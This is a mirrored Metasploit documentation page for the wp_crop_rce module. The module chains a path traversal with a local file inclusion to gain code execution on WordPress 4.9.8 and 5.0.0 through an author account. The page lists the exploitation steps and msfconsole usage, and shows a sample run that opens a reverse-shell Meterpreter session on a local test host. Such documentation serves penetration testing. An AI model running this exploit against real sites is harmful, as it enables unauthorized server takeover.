dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/wp_crop_rce.md

2.3 KiB
Raw Permalink Blame History

On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion. An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.

Exploitation Steps

  1. Upload an image containing PHP code
  2. Edit the _wp_attached_file entry from meta_input $_POST array to specify an arbitrary path
  3. Perform the Path Traversal by using the crop-image Wordpress function
  4. Perform the Local File Inclusion by creating a new WordPress post and set _wp_page_template value to the cropped image. The post will include() our image containing PHP code.

When visiting the post created by the attacker it is possible to obtain code execudion.

More details can be found on RIPS Technology Blog.

Verification Steps

Confirm that functionality works:

  1. Start msfconsole
  2. use exploit/multi/http/wp_crop_rce
  3. Set the RHOST
  4. Set USERNAME and PASSWORD
  5. Set LHOST and LPORT
  6. Run the exploit: run
  7. Confirm you have now a meterpreter session

Options

THEME_DIR

The name of the theme Wordpress is using. Used if the theme cannot be auto-detected.

Scenarios

Ubuntu 18.04 running WordPress 4.9.8

msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux